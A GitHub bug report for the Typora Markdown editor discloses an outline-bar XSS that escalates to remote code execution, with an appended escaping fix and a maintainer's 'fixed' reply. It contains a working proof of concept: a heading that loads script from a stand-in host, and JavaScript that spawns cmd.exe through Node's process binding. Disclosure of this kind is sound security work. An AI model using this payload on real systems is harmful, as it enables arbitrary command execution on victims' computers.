Typora XSS to RCE #2124

Closed
Li4n0 opened this issue Jan 24, 2019 · 1 comment
Li4n0 commented Jan 24, 2019

The filtering rules on the left outline bar are not perfect. This will cause XSS when the document has the following content, which could then be escalated to RCE:
e.g.:

```markdown
# 1
#  <script src=https://hacker_s_url/xss.js></script>
```

```javascript
// xss.js's content
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function (a, b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
    file: 'cmd.exe',
    args: ['/k netplwiz'],
    cwd: null,
    windowsVerbatimArguments: false,
    detached: false,
    envPairs: env_,
    stdio: [{
        type: 'ignore'
    }, {
        type: 'ignore'
    }, {
        type: 'ignore'
    }]
});
```

This could execute a cmd command.

The Linux and Mac versions have the same problem.
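The class of fix for the outline issue reported above, as an added example that is not part of the original issue and is not Typora's code: heading text is HTML-escaped before it is placed in the outline markup, so the reported heading renders as inert text. The function names, CSS class names and the `SAMPLE` document are assumptions made for illustration.

```javascript
// Added example (not Typora's code): build outline HTML from Markdown
// headings while treating heading text strictly as text, never as markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Replace every character that is significant in HTML with its entity.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Collect ATX headings (# to ######), ignoring lines inside fenced code.
function extractHeadings(markdown) {
  const headings = [];
  let inFence = false;
  for (const line of markdown.split(/\r?\n/)) {
    if (/^\s{0,3}(```|~~~)/.test(line)) {
      inFence = !inFence;
      continue;
    }
    if (inFence) continue;
    const m = /^\s{0,3}(#{1,6})[ \t]+(.*?)\s*$/.exec(line);
    if (m) headings.push({ level: m[1].length, text: m[2] });
  }
  return headings;
}

// Render the outline; every heading passes through escapeHtml first.
function renderOutline(markdown) {
  const items = extractHeadings(markdown).map(
    (h) => `<li class="outline-h${h.level}">${escapeHtml(h.text)}</li>`
  );
  return `<ul class="outline">${items.join('')}</ul>`;
}

// Constructed sample: the two headings from the issue's document.
const SAMPLE =
  '# 1\n#  <script src=https://hacker_s_url/xss.js></script> \n';

console.log(renderOutline(SAMPLE));
```

Escaping addresses the injection point only; the escalation in the posted `xss.js` additionally depends on Node's `process` object being reachable from script running in the rendered page.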

abnerlee added the bug label Jan 24, 2019

@abnerlee (Contributor)

Fixed in new release
